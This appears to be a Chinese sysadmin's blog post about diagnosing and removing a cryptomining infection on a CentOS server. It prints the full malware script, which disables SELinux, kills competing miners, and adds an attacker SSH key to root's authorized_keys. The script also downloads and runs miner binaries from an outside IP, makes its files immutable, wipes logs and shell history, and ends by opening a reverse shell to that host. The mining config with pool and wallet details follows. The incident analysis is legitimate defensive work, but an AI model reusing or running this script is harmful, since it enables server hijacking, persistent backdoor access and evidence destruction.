我手上有一台CentOS6.9服务器,某天发现运行程序很慢,于是查看负载情况,CPU占满:
占满CPU的是两个程序:devtool和systemctl,根据PID找到启动程序的文件:
ll /proc/23527 | grep exe
ll /proc/23570 | grep exe
启动程序的文件是:/tmp/devtool和/tmp/systemctI。
然后,我将这两个文件重命名,kill掉23527和23570这两个进程。过了几分钟,发现devtool和systemctl进程又出现,把CPU占满,并且/tmp目录下也重新生成了devtool和systemctl文件。生成文件的时间为13:40,刚好是整数分钟,觉得这里有点奇怪,我又重复了一次kill进程和重命名devtool、systemctl文件的操作,到了13:50,进程又自动起来了。
于是,我将情况发到群里求助:
先查看/var/log/cron:
more /var/log/cron |grep hadoop
13:40和13:50,都有执行/tmp/update.sh。再查看crontab:
*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1
是这里在作怪,每10分钟调用一次/tmp/update.sh,查看里面的文件内容:
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/devtools
rtdir="/etc/devtools"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f polkitd
pkill -f nanoWatch
pkill -f zigw
crontab -r
ps axf -o "pid"|while read procid
do
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
cat /proc/$procid/cmdline| grep -a -E "devtool|update.sh|systemctI"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo "don't kill"
fi
fi
done
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
cat /proc/$procid/cmdline| grep -a -E "devtool|update.sh|systemctI"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo "don't kill"
fi
done
if [ -f "$rtdir" ]
then
echo "i am root"
echo "goto 1" >> /etc/devtools
chattr -i /etc/devtool*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/systemctI
if [ -f "/usr/bin/crontab" ]
then
[[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/10 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
else
echo "*/10 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
fi
chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPK+J+AIJvoCX67fFzfbNU5MT816KDmggltbgEI0hKZRdmMMe1ao/3CEgIzeqGbTff1suT/F1POUjGrf5t/ZqyIJzCIBKqNsxzM4tRNxrIGrqKnZ
ypRlXdX+uZNaxmNJZGkkmtdeseekped0WnWk5SsvbYghBn4y9lZnsO+C1EgjLNWkbRPuoo/RkWTIXDmB7M7UcfYf+sSpApACt8DRydSEkeY709WtL0aANnN057Wnp/Okv+buM4mnkuteLtZvCAySt7PVBrCKyhItZx9V
X/TMegljt/UPDaKfAeWF14Q1ORLRQkzZt9k+pY/ccNNbS53OmG0NhQ/awchmgXUpsP [email protected]" >> /root/.ssh/authorized_keys
cfg="/etc/config.json"
file="/etc/devtool"
if [-f "/etc/config.json" ]
then
filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
if [ "$filesize_config" -ne "3629" ]
then
rm /etc/config.json
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
fi
pkill -f devtool
else
echo "no need download"
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /etc/config.json
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
fi
fi
if [ -f "/etc/devtool" ]
then
filesize1=`ls -l /etc/devtool | awk '{ print $5 }'`
if [ "$filesize1" -ne "1489384" ]
then
rm /etc/devtool
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
fi
else
echo "not need download"
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /etc/devtool
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
fi
fi
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /etc/update.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /etc/update.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
fi
if [ -f "/etc/systemctI" ]
then
filesize2=`ls -l /etc/systemctI | awk '{ print $5 }'`
if [ "$filesize2" -ne "2141224" ]
then
rm /etc/systemctI
pkill -f systemctI
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
fi
else
echo "not need download"
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /etc/systemctI
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /etc/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
fi
fi
chmod 777 /etc/devtool
ps -fe|grep devtool |grep -v grep
if [ $? -ne 0 ]
then
cd /etc
echo "not root runing"
sleep 5s
./devtool &
else
echo "root runing....."
fi
chmod 777 /etc/systemctI
ps -fe|grep systemctI |grep -v grep
if [ $? -ne 0 ]
then
cd /etc
echo "not roots runing"
sleep 5s
./systemctI &
else
echo "roots runing....."
fi
chmod 777 /etc/devtool
chattr +i /etc/devtool
chmod 777 /etc/systemctI
chattr +i /etc/systemctI
chmod 777 /etc/config.json
chattr +i /etc/config.json
chmod 777 /etc/update.sh
chattr +i /etc/update.sh
chmod 777 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
else
echo "goto 1" > /tmp/devtools
chattr -i /tmp/devtool*
chattr -i /tmp/systemctI
chattr -i /tmp/config.json*
chattr -i /tmp/update.sh*
if [ -f "/usr/bin/crontab" ]
then
[[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -
else
echo "*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}
fi
if [ -f "/tmp/config.json" ]
then
filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
if [ "$filesize1" -ne "3629" ]
then
rm /tmp/config.json
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
fi
pkill -f devtool
else
echo "no need download"
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json > /tmp/config.json
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/config.json http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/config.json
fi
fi
if [ -f "/tmp/devtool" ]
then
filesize1=`ls -l /tmp/devtool | awk '{ print $5 }'`
if [ "$filesize1" -ne "1489384" ]
then
rm /tmp/devtool
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
fi
else
echo "no need download"
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool > /tmp/devtool
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/ devtool http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/devtool
fi
fi
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /tmp/update.sh
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh > /tmp/update.sh
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/update.sh http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/update.sh
fi
if [ -f "/tmp/systemctI" ]
then
filesize2=`ls -l /tmp/systemctI | awk '{ print $5 }'`
if [ "$filesize2" -ne "2141224" ]
then
rm /tmp/systemctI
pkill -f systemctI
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
fi
else
echo "no need download"
fi
else
if [ -f "$bbdir" ]
then
curl --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
elif [ -f "$bbdira" ]
then
url --connect-timeout 10 --retry 100 http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI > /tmp/systemctI
elif [ -f "$ccdir" ]
then
wget --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
elif [ -f "$ccdira" ]
then
get --timeout=10 --tries=100 -O /tmp/systemctI http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/systemctI
fi
fi
ps -fe|grep devtool |grep -v grep
if [ $? -ne 0 ]
then
echo "not tmp runing"
cd /tmp
chmod 777 devtool
sleep 5s
./devtool &
else
echo "tmp runing....."
fi
ps -fe|grep systemctI |grep -v grep
if [ $? -ne 0 ]
then
echo "not tmps runing"
cd /tmp
chmod 777 systemctI
sleep 5s
./systemctI &
else
echo "tmps runing....."
fi
chmod 777 /tmp/devtool
chattr +i /tmp/devtool
chmod 777 /tmp/systemctI
chattr +i /tmp/systemctI
chmod 777 /tmp/update.sh
chattr +i /tmp/update.sh
chmod 777 /tmp/config.json
chattr +i /tmp/config.json
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
bash -i >& /dev/tcp/207.148.70.143/8888 0>&1
207.148.70.143这个IP是新加坡的,应该是Server。上面文件里面,引用了一个配置文件/tmp/config.json,打开查看内容:
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"id": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"asm": true,
"autosave": true,
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 1,
"huge-pages": true,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 90,
"pools": [
{
"url": "xmr.f2pool.com:13531",
"user": "83p6VPXu8SsZsH22EG9iQxg97M6K81Jft1CGXYwrVgkSa45KQm6Dau9HN6w3oroHKfJkzL2298CVD41eejCvJTd76Grq9wd.gbgbhft656561",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": 8,
"tls": false,
"tls-fingerprint": null
},
{
"url": "xmr.pool.minergate.com:45700",
"user": "jbk665q8hws5vxv",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": 8,
"tls": false,
"tls-fingerprint": null
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": [
{
"low_power_mode": 1,
"affine_to_cpu": 0,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 1,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 2,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 3,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 4,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 5,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 6,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 7,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 8,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 9,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 10,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 11,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 12,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 13,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 14,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 15,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 16,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 17,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 18,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 19,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 20,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 21,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 22,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 23,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 24,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 25,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 26,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 27,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 28,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 29,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 30,
"asm": true
},
{
"low_power_mode":1,
"affine_to_cpu": 31,
"asm": true
}
],
"user-agent": null,
"watch": false
}
从上面文件看到,有两个矿池:
xmr.f2pool.com:13531
xmr.pool.minergate.com:45700
随后,我先删除crontab里面的以下调度:
*/10 * * * * sh /tmp/update.sh >/dev/null 2>&1
再删除相关文件:
rm /tmp/update.sh
rm /tmp/systemctI
rm /tmp/devtool
rm /tmp/devtools
rm /tmp/config.json
systemctI和devtool进程没有再启动。
思考:
中招的服务器限制了只能通过内网的一台跳板机访问,跳板机开放了外网,有限制只能在办公环境的外网IP访问。
查看登录日志/var/log/wtmp:
last -f /var/log/wtmp
所有的登录都来自跳板机。
木马程序是从哪里植入的?原因还要继续深挖。